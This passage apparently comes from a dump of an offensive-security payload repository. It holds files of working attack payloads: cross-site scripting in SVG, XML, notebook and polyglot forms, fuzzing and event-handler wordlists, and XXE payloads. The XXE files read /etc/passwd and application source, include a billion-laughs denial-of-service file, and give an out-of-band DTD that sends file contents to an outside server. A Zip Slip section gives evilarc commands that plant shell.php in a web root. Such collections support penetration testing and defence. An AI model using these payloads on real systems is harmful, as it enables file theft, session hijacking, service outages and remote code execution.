 9 | </xsl:template>
10 | </xsl:stylesheet>


--------------------------------------------------------------------------------
/XSLT Injection/Files/xxe.xsl:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <!DOCTYPE dtd_sample[<!ENTITY ext_file SYSTEM "C:\secretfruit.txt">]>
 3 | <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
 4 |   <xsl:template match="/fruits">
 5 |     Fruits &ext_file;:
 6 |     <!-- Loop for each fruit -->
 7 |     <xsl:for-each select="fruit">
 8 |       <!-- Print name: description -->
 9 |       - <xsl:value-of select="name"/>: <xsl:value-of select="description"/>
10 |     </xsl:for-each>
11 |   </xsl:template>
12 | </xsl:stylesheet>


--------------------------------------------------------------------------------
/XSS Injection/Files/InsecureFlashFile.swf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/XSS Injection/Files/InsecureFlashFile.swf


--------------------------------------------------------------------------------
/XSS Injection/Files/JupyterNotebookXSS.ipynb:
--------------------------------------------------------------------------------
 1 | {
 2 |  "cells": [
 3 |   {
 4 |    "cell_type": "markdown",
 5 |    "metadata": {},
 6 |    "source": [
 7 |     "[XSS](data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+Cg==)\n"
 8 |    ]
 9 |   }
10 |  ],
11 |  "metadata": {
12 |   "kernelspec": {
13 |    "display_name": "Python 3",
14 |    "language": "python",
15 |    "name": "python3"
16 |   },
17 |   "language_info": {
18 |    "codemirror_mode": {
19 |     "name": "ipython",
20 |     "version": 3
21 |    },
22 |    "file_extension": ".py",
23 |    "mimetype": "text/x-python",
24 |    "name": "python",
25 |    "nbconvert_exporter": "python",
26 |    "pygments_lexer": "ipython3",
27 |    "version": "3.6.2"
28 |   }
29 |  },
30 |  "nbformat": 4,
31 |  "nbformat_minor": 2
32 | }
33 | 


--------------------------------------------------------------------------------
/XSS Injection/Files/SVG_XSS1.svg:
--------------------------------------------------------------------------------
1 | <svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>
2 | 


--------------------------------------------------------------------------------
/XSS Injection/Files/SVG_XSS2.svg:
--------------------------------------------------------------------------------
1 | <svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg>
2 | 


--------------------------------------------------------------------------------
/XSS Injection/Files/SVG_XSS3.svg:
--------------------------------------------------------------------------------
1 | <svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>
2 | 


--------------------------------------------------------------------------------
/XSS Injection/Files/SVG_XSS_green_triangle.svg:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" standalone="no"?>
2 | <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
3 | 
4 | <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
5 |    <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
6 |    <script type="text/javascript">
7 |       alert(document.domain);
8 |    </script>
9 | </svg>


--------------------------------------------------------------------------------
/XSS Injection/Files/SVG_XSS_nested_img_xlink.svg:
--------------------------------------------------------------------------------
1 | <svg width="200" height="200" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
2 |   <image xlink:href="http://127.0.0.1:9999/red_lightning_xss_full.svg" height="200" width="200"/>
3 | </svg>


--------------------------------------------------------------------------------
/XSS Injection/Files/SVG_XSS_nested_svg.svg:
--------------------------------------------------------------------------------
 1 | <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
 2 |   <svg x="10">
 3 |     <rect x="10" y="10" height="100" width="100" style="fill: #002654"/>
 4 |     <script type="text/javascript">alert('sub-svg 1');</script>
 5 |   </svg>
 6 |   <svg x="200">
 7 |     <rect x="10" y="10" height="100" width="100" style="fill: #ED2939"/>
 8 |     <script type="text/javascript">alert('sub-svg 2');</script>
 9 |   </svg>
10 | </svg>


--------------------------------------------------------------------------------
/XSS Injection/Files/SVG_XSS_nested_use_xlink.svg:
--------------------------------------------------------------------------------
1 | <svg width="200" height="200" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
2 |   <use xlink:href="http://127.0.0.1:9999/red_lightning_xss_full.svg#lightning"/>
3 | </svg>


--------------------------------------------------------------------------------
/XSS Injection/Files/SVG_XSS_red_lightning.svg:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" standalone="no"?>
 2 | <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
 3 | <svg version="1.1" baseProfile="full" width="100" height="100" xmlns="http://www.w3.org/2000/svg" onload="alert('svg attribut')">
 4 |   <polygon id="lightning" points="0,100 50,25 50,75 100,0" fill="#ff1919" stroke="#ff0000"/>
 5 |   <desc><script>alert('svg desc')</script></desc>
 6 |   <foreignObject><script>alert('svg foreignObject')</script></foreignObject>
 7 |   <foreignObject width="500" height="500">
 8 |     <iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert('svg foreignObject iframe');" width="400" height="250"/>
 9 |   </foreignObject>
10 |   <title><script>alert('svg title')</script></title>
11 |   <animatetransform onbegin="alert('svg animatetransform onbegin')"></animatetransform>
12 |   <script type="text/javascript">
13 |     alert('svg script');
14 |   </script>
15 | </svg>


--------------------------------------------------------------------------------
/XSS Injection/Files/SWF_XSS.swf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/XSS Injection/Files/SWF_XSS.swf


--------------------------------------------------------------------------------
/XSS Injection/Files/mouseover-xss-ecs.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/XSS Injection/Files/mouseover-xss-ecs.jpeg


--------------------------------------------------------------------------------
/XSS Injection/Files/onclick-xss-ecs.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/XSS Injection/Files/onclick-xss-ecs.jpeg


--------------------------------------------------------------------------------
/XSS Injection/Files/payload_in_all_known_exif_corrupted.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/XSS Injection/Files/payload_in_all_known_exif_corrupted.jpg


--------------------------------------------------------------------------------
/XSS Injection/Files/payload_in_all_known_exif_corrupted.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/XSS Injection/Files/payload_in_all_known_exif_corrupted.png


--------------------------------------------------------------------------------
/XSS Injection/Files/payload_in_all_known_metadata.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/XSS Injection/Files/payload_in_all_known_metadata.jpg


--------------------------------------------------------------------------------
/XSS Injection/Files/payload_in_all_known_metadata.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/XSS Injection/Files/payload_in_all_known_metadata.png


--------------------------------------------------------------------------------
/XSS Injection/Files/payload_text_xss.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/XSS Injection/Files/payload_text_xss.png


--------------------------------------------------------------------------------
/XSS Injection/Files/xml.xsd:
--------------------------------------------------------------------------------
1 | <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.cer:
--------------------------------------------------------------------------------
1 | <script>alert(1)</script>


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.dtd:
--------------------------------------------------------------------------------
1 | <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.htm:
--------------------------------------------------------------------------------
1 | <script>alert(1)</script>


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.html.demo:
--------------------------------------------------------------------------------
1 | <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.hxt:
--------------------------------------------------------------------------------
1 | <script>alert(1)</script>


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.mno:
--------------------------------------------------------------------------------
1 | <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1337)</a:script>


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.rdf:
--------------------------------------------------------------------------------
1 | <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.svgz:
--------------------------------------------------------------------------------
1 | <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.url.url:
--------------------------------------------------------------------------------
1 | <html>
2 |     <script>alert(document.domain)</script>
3 | </html>


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.vml:
--------------------------------------------------------------------------------
1 | <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.wsdl:
--------------------------------------------------------------------------------
1 | <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.xht:
--------------------------------------------------------------------------------
1 | <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.xhtml:
--------------------------------------------------------------------------------
1 | <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.xml:
--------------------------------------------------------------------------------
 1 | <html>
 2 | 	<head></head>
 3 | 	<body>
 4 | 		<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
 5 | 		<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(2)</a:script>
 6 | 		<info>
 7 | 		  <name>
 8 | 		    <value><![CDATA[<script>confirm(document.domain)</script>]]></value>
 9 | 		  </name>
10 | 		    <description>
11 | 		      <value>Hello</value>
12 | 		    </description>
13 | 		    <url>
14 | 		      <value>http://google.com</value>
15 | 		    </url>
16 | 		</info>
17 | 	</body>
18 | </html>
19 | 


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.xsd:
--------------------------------------------------------------------------------
1 | <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.xsf:
--------------------------------------------------------------------------------
1 | <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.xsl:
--------------------------------------------------------------------------------
1 | <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.xslt:
--------------------------------------------------------------------------------
1 | <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>


--------------------------------------------------------------------------------
/XSS Injection/Files/xss_comment_exif_metadata_double_quote.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/XSS Injection/Files/xss_comment_exif_metadata_double_quote.png


--------------------------------------------------------------------------------
/XSS Injection/Files/xss_comment_exif_metadata_single_quote.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/XSS Injection/Files/xss_comment_exif_metadata_single_quote.png


--------------------------------------------------------------------------------
/XSS Injection/Images/DwrkbH1VAAErOI2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/XSS Injection/Images/DwrkbH1VAAErOI2.jpg


--------------------------------------------------------------------------------
/XSS Injection/Intruders/0xcela_event_handlers.txt:
--------------------------------------------------------------------------------
  1 | FSCommand
  2 | onAbort
  3 | onActivate
  4 | onAfterPrint
  5 | onAfterUpdate
  6 | onBeforeActivate
  7 | onBeforeCopy
  8 | onBeforeCut
  9 | onBeforeDeactivate
 10 | onBeforeEditFocus
 11 | onBeforePaste
 12 | onBeforePrint
 13 | onBeforeUnload
 14 | onBeforeUpdate
 15 | onBegin
 16 | onBlur
 17 | onBounce
 18 | onCellChange
 19 | onChange
 20 | onClick
 21 | onContextMenu
 22 | onControlSelect
 23 | onCopy
 24 | onCut
 25 | onDataAvailable
 26 | onDataSetChanged
 27 | onDataSetComplete
 28 | onDblClick
 29 | onDeactivate
 30 | onDrag
 31 | onDragDrop
 32 | onDragEnd
 33 | onDragEnter
 34 | onDragLeave
 35 | onDragOver
 36 | onDragStart
 37 | onDrop
 38 | onEnd
 39 | onError
 40 | onErrorUpdate
 41 | onFilterChange
 42 | onFinish
 43 | onFocus
 44 | onFocusIn
 45 | onFocusOut
 46 | onHashChange
 47 | onHelp
 48 | onInput
 49 | onKeyDown
 50 | onKeyPress
 51 | onKeyUp
 52 | onLayoutComplete
 53 | onLoad
 54 | onLoseCapture
 55 | onMediaComplete
 56 | onMediaError
 57 | onMessage
 58 | onMouseDown
 59 | onMouseEnter
 60 | onMouseLeave
 61 | onMouseMove
 62 | onMouseOut
 63 | onMouseOver
 64 | onMouseUp
 65 | onMouseWheel
 66 | onMove
 67 | onMoveEnd
 68 | onMoveStart
 69 | onOffline
 70 | onOnline
 71 | onOutOfSync
 72 | onPaste
 73 | onPause
 74 | onPopState
 75 | onProgress
 76 | onPropertyChange
 77 | onReadyStateChange
 78 | onRedo
 79 | onRepeat
 80 | onReset
 81 | onResize
 82 | onResizeEnd
 83 | onResizeStart
 84 | onResume
 85 | onReverse
 86 | onRowDelete
 87 | onRowExit
 88 | onRowInserted
 89 | onRowsEnter
 90 | onScroll
 91 | onSeek
 92 | onSelect
 93 | onSelectStart
 94 | onSelectionChange
 95 | onStart
 96 | onStop
 97 | onStorage
 98 | onSubmit
 99 | onSyncRestored
100 | onTimeError
101 | onTrackChange
102 | onURLFlip
103 | onUndo
104 | onUnload
105 | seekSegmentTime
106 | 


--------------------------------------------------------------------------------
/XSS Injection/Intruders/BRUTELOGIC-XSS-JS.txt:
--------------------------------------------------------------------------------
 1 | alert`1`
 2 | alert&lpar;1&rpar;
 3 | alert&#x28;1&#x29
 4 | alert&#40;1&#41
 5 | (alert)(1)
 6 | a=alert,a(1)
 7 | [1].find(alert)
 8 | top["al"+"ert"](1)
 9 | top[/al/.source+/ert/.source](1)
10 | al\u0065rt(1)
11 | top['al\145rt'](1)
12 | top['al\x65rt'](1)
13 | top[8680439..toString(30)](1)
14 | navigator.vibrate(500)
15 | eval(URL.slice(-8))>#alert(1)
16 | eval(location.hash.slice(1)>#alert(1)
17 | innerHTML=location.hash>#<script>alert(1)</script>
18 | 


--------------------------------------------------------------------------------
/XSS Injection/Intruders/XSS_Polyglots.txt:
--------------------------------------------------------------------------------
 1 | jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
 2 | ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
 3 | “ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
 4 | '">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg">
 5 | javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
 6 | javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
 7 | javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
 8 | javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
 9 | javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
10 | javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
11 | javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
12 | --></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
13 | /</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
14 | javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
15 | /</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
16 | JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->
17 | 


--------------------------------------------------------------------------------
/XSS Injection/Intruders/port_swigger_xss_cheatsheet_event_handlers.txt:
--------------------------------------------------------------------------------
  1 | onafterprint
  2 | onafterscriptexecute
  3 | onanimationcancel
  4 | onanimationend
  5 | onanimationiteration
  6 | onanimationstart
  7 | onauxclick
  8 | onbeforecopy
  9 | onbeforecut
 10 | onbeforeinput
 11 | onbeforeprint
 12 | onbeforescriptexecute
 13 | onbeforetoggle
 14 | onbeforeunload
 15 | onbegin
 16 | onblur
 17 | onbounce
 18 | oncanplay
 19 | oncanplaythrough
 20 | onchange
 21 | onclick
 22 | onclose
 23 | oncontextmenu
 24 | oncopy
 25 | oncuechange
 26 | oncut
 27 | ondblclick
 28 | ondrag
 29 | ondragend
 30 | ondragenter
 31 | ondragexit
 32 | ondragleave
 33 | ondragover
 34 | ondragstart
 35 | ondrop
 36 | ondurationchange
 37 | onend
 38 | onended
 39 | onerror
 40 | onfinish
 41 | onfocus
 42 | onfocusin
 43 | onfocusout
 44 | onformdata
 45 | onfullscreenchange
 46 | onhashchange
 47 | oninput
 48 | oninvalid
 49 | onkeydown
 50 | onkeypress
 51 | onkeyup
 52 | onload
 53 | onloadeddata
 54 | onloadedmetadata
 55 | onloadstart
 56 | onmessage
 57 | onmousedown
 58 | onmouseenter
 59 | onmouseleave
 60 | onmousemove
 61 | onmouseout
 62 | onmouseover
 63 | onmouseup
 64 | onmousewheel
 65 | onmozfullscreenchange
 66 | onpagehide
 67 | onpageshow
 68 | onpaste
 69 | onpause
 70 | onplay
 71 | onplaying
 72 | onpointerdown
 73 | onpointerenter
 74 | onpointerleave
 75 | onpointermove
 76 | onpointerout
 77 | onpointerover
 78 | onpointerrawupdate
 79 | onpointerup
 80 | onpopstate
 81 | onprogress
 82 | onratechange
 83 | onrepeat
 84 | onreset
 85 | onresize
 86 | onscroll
 87 | onscrollend
 88 | onsearch
 89 | onseeked
 90 | onseeking
 91 | onselect
 92 | onselectionchange
 93 | onselectstart
 94 | onshow
 95 | onstart
 96 | onsubmit
 97 | onsuspend
 98 | ontimeupdate
 99 | ontoggle
100 | ontouchend
101 | ontouchmove
102 | ontouchstart
103 | ontransitioncancel
104 | ontransitionend
105 | ontransitionrun
106 | ontransitionstart
107 | onunhandledrejection
108 | onunload
109 | onvolumechange
110 | onwebkitanimationend
111 | onwebkitanimationiteration
112 | onwebkitanimationstart
113 | onwebkittransitionend
114 | onwheel
115 | 


--------------------------------------------------------------------------------
/XSS Injection/Intruders/xss_payloads_quick.txt:
--------------------------------------------------------------------------------
 1 | javascript:alert(1)//INJECTX
 2 | <svg/onload=alert(1)>//INJECTX
 3 | <img onload=alert(1)>//INJECTX
 4 | <img src=x onerror=prompt(1)>//INJECTX
 5 | <a href="javascript:alert(1)" onmouseover=alert(1)>INJECTX HOVER</a>
 6 |  onmouseover="document.cookie=true;">//INJECTX
 7 | alert(1)>//INJECTX
 8 | <h1>INJECTX</h1>
 9 | <img src=x onload=prompt(1) onerror=alert(1) onmouseover=prompt(1)>
10 | <svg><script>/<@/>alert(1)</script>//INJECTX
11 | <svg/onload=alert(/INJECTX/)>
12 | <iframe/onload=alert(/INJECTX/)>
13 | <svg/onload=alert`INJECTX`>
14 | <svg/onload=alert(/INJECTX/)>
15 | <svg/onload=alert(`INJECTX`)>
16 | }alert(/INJECTX/);{//
17 | <h1/onclick=alert(1)>a//INJECTX
18 | <svg/onload=alert(/INJECTX/)>
19 | <p/onclick=alert(/INJECTX/)>a
20 | <svg/onload=alert`INJECTX`>
21 | <svg/onload=alert(/INJECTX/)>
22 | <svg/onload=alert(`INJECTX`)>
23 | <video><source onerror="javascript:alert(1)">//INJECTX
24 | <video onerror="javascript:alert(1)"><source>//INJECTX
25 | <audio onerror="javascript:alert(1)"><source>//INJECTX
26 | <input autofocus onfocus=alert(1)>//INJECTX
27 | <select autofocus onfocus=alert(1)>//INJECTX
28 | <textarea autofocus onfocus=alert(1)>//INJECTX
29 | <keygen autofocus onfocus=alert(1)>//INJECTX
30 | <button form=test onformchange=alert(1)>//INJECTX
31 | <form><button formaction="javascript:alert(1)">//INJECTX
32 | <svg onload=(alert)(1) >//INJECTX
33 | <script>$=1,alert($)</script>//INJECTX
34 | <!--<img src="--><img src=x onerror=alert(1)//">//INJECTX
35 | <img/src='x'onerror=alert(1)>//INJECTX
36 | <marguee/onstart=alert(1)>//INJECTX
37 | <script>alert(1)//INJECTX
38 | <script>alert(1)<!--INJECTX
39 | <marquee loop=1 width=0 onfinish=alert(1)>//INJECTX


--------------------------------------------------------------------------------
/XSS Injection/Intruders/xss_swf_fuzz.txt:
--------------------------------------------------------------------------------
 1 | #getURL,javascript:alert(1)",
 2 | #goto,javascript:alert(1)",	
 3 | ?javascript:alert(1)",
 4 | ?alert(1)",
 5 | ?getURL(javascript:alert(1))",
 6 | ?asfunction:getURL,javascript:alert(1)//",
 7 | ?getURL,javascript:alert(1)",
 8 | ?goto,javascript:alert(1)",		
 9 | ?clickTAG=javascript:alert(1)",
10 | ?url=javascript:alert(1)",
11 | ?clickTAG=javascript:alert(1)&TargetAS=",
12 | ?TargetAS=javascript:alert(1)",
13 | ?skinName=asfunction:getURL,javascript:alert(1)//",
14 | ?baseurl=asfunction:getURL,javascript:alert(1)//",
15 | ?base=javascript:alert(0)",                
16 | ?onend=javascript:alert(1)//",
17 | ?userDefined=');function someFunction(a){}alert(1)//",        
18 | ?URI=javascript:alert(1)",
19 | ?callback=javascript:alert(1)",
20 | ?getURLValue=javascript:alert(1)",
21 | ?goto=javascript:alert(1)",
22 | ?pg=javascript:alert(1)",
23 | ?page=javascript:alert(1)"
24 | ?playerready=alert(document.cookie)
25 | 


--------------------------------------------------------------------------------
/XXE Injection/Files/Classic XXE - etc passwd.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0"?>
2 | <!DOCTYPE data [
3 | <!ELEMENT data (#ANY)>
4 | <!ENTITY file SYSTEM "file:///etc/passwd">
5 | ]>
6 | <data>&file;</data>
7 | 


--------------------------------------------------------------------------------
/XXE Injection/Files/Classic XXE B64 Encoded.xml:
--------------------------------------------------------------------------------
1 | <!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>
2 | 


--------------------------------------------------------------------------------
/XXE Injection/Files/Classic XXE.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0"?>
2 | <!DOCTYPE data [
3 | <!ELEMENT data (#ANY)>
4 | <!ENTITY file SYSTEM "file:///sys/power/image_size">
5 | ]>
6 | <data>&file;</data>


--------------------------------------------------------------------------------
/XXE Injection/Files/Deny Of Service - Billion Laugh Attack:
--------------------------------------------------------------------------------
1 | <!DOCTYPE data [
2 | <!ENTITY a0 "dos" >
3 | <!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
4 | <!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
5 | <!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
6 | <!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
7 | ]>
8 | <data>&a4;</data>


--------------------------------------------------------------------------------
/XXE Injection/Files/XXE OOB Attack (Yunusov, 2013).xml:
--------------------------------------------------------------------------------
1 | XXE OOB Attack (Yunusov, 2013)
2 | <?xml version="1.0" encoding="utf-8"?>
3 | <!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd">
4 | <data>&send;</data>
5 | 
6 | File stored on http://publicServer.com/parameterEntity_oob.dtd
7 | <!ENTITY % file SYSTEM "file:///sys/power/image_size">
8 | <!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>">
9 | %all;


--------------------------------------------------------------------------------
/XXE Injection/Files/XXE PHP Wrapper.xml:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
 2 | <contacts>
 3 |   <contact>
 4 |     <name>Jean &xxe; Dupont</name>
 5 |     <phone>00 11 22 33 44</phone>
 6 |     <address>42 rue du CTF</address>
 7 |     <zipcode>75000</zipcode>
 8 |     <city>Paris</city>
 9 |   </contact>
10 | </contacts>
11 | 


--------------------------------------------------------------------------------
/Zip Slip/README.md:
--------------------------------------------------------------------------------
 1 | # Zip Slip
 2 | 
 3 | > The vulnerability is exploited using a specially crafted archive that holds directory traversal filenames (e.g. ../../shell.php). The Zip Slip vulnerability can affect numerous archive formats, including tar, jar, war, cpio, apk, rar and 7z. The attacker can then overwrite executable files and either invoke them remotely or wait for the system or user to call them, thus achieving remote command execution on the victim’s machine.
 4 | 
 5 | ## Summary
 6 | 
 7 | * [Tools](#tools)
 8 | * [Methodology](#methodology)
 9 | * [References](#references)
10 | 
11 | ## Tools
12 | 
13 | * [ptoomey3/evilarc](https://github.com/ptoomey3/evilarc) - Create tar/zip archives that can exploit directory traversal vulnerabilities
14 | * [usdAG/slipit](https://github.com/usdAG/slipit) - Utility for creating ZipSlip archives
15 | 
16 | ## Methodology
17 | 
18 | The Zip Slip vulnerability is a critical security flaw that affects the handling of archive files, such as ZIP, TAR, or other compressed file formats. This vulnerability allows an attacker to write arbitrary files outside of the intended extraction directory, potentially overwriting critical system files, executing malicious code, or gaining unauthorized access to sensitive information.
19 | 
20 | **Example**: Suppose an attacker creates a ZIP file with the following structure:
21 | 
22 | ```ps1
23 | malicious.zip
24 |   ├── ../../../../etc/passwd
25 |   ├── ../../../../usr/local/bin/malicious_script.sh
26 | ```
27 | 
28 | When a vulnerable application extracts `malicious.zip`, the files are written to `/etc/passwd` and /`usr/local/bin/malicious_script.sh` instead of being contained within the extraction directory. This can have severe consequences, such as corrupting system files or executing malicious scripts.
29 | 
30 | * Using [ptoomey3/evilarc](https://github.com/ptoomey3/evilarc):
31 | 
32 |     ```python
33 |     python evilarc.py shell.php -o unix -f shell.zip -p var/www/html/ -d 15
34 |     ```
35 | 
36 | * Creating a ZIP archive containing a symbolic link:
37 | 
38 |     ```ps1
39 |     ln -s ../../../index.php symindex.txt
40 |     zip --symlinks test.zip symindex.txt
41 |     ```
42 | 
43 | For a list of affected libraries and projects, visit [snyk/zip-slip-vulnerability](https://github.com/snyk/zip-slip-vulnerability)
44 | 
45 | ## References
46 | 
47 | * [Zip Slip - Snyk - June 5, 2018](https://github.com/snyk/zip-slip-vulnerability)
48 | * [Zip Slip Vulnerability - Snyk - April 15, 2018](https://snyk.io/research/zip-slip-vulnerability)
49 | 


--------------------------------------------------------------------------------
/_template_vuln/README.md:
--------------------------------------------------------------------------------
 1 | # Vulnerability Title
 2 | 
 3 | > Vulnerability description - reference
 4 | 
 5 | ## Summary
 6 | 
 7 | * [Tools](#tools)
 8 | * [Methodology](#methodology)
 9 |     * [Subentry 1](#subentry-1)
10 |     * [Subentry 2](#subentry-2)
11 | * [Labs](#labs)
12 | * [References](#references)
13 | 
14 | ## Tools
15 | 
16 | * [username/tool1](https://github.com/username/tool1) - Description of the tool
17 | * [username/tool2](https://github.com/username/tool2) - Description of the tool
18 | 
19 | ## Methodology
20 | 
21 | Quick explanation
22 | 
23 | ```powershell
24 | Exploit
25 | ```
26 | 
27 | ### Subentry 1
28 | 
29 | ### Subentry 2
30 | 
31 | ## Labs
32 | 
33 | * [Root Me - Lab 1](https://root-me.org)
34 | * [PortSwigger - Lab 2](https://portswigger.net)
35 | * [HackTheBox - Lab 3](https://www.hackthebox.com)
36 | 
37 | ## References
38 | 
39 | * [Blog title - Author (@handle) - Month XX, 202X](https://example.com)
40 | 


--------------------------------------------------------------------------------
/custom.css:
--------------------------------------------------------------------------------
 1 | .md-header{
 2 |     background-color: #1f7884;
 3 | }
 4 | 
 5 | @media screen and (min-width: 790px) {
 6 |     .md-grid{
 7 |         max-width: 100%;
 8 |     }
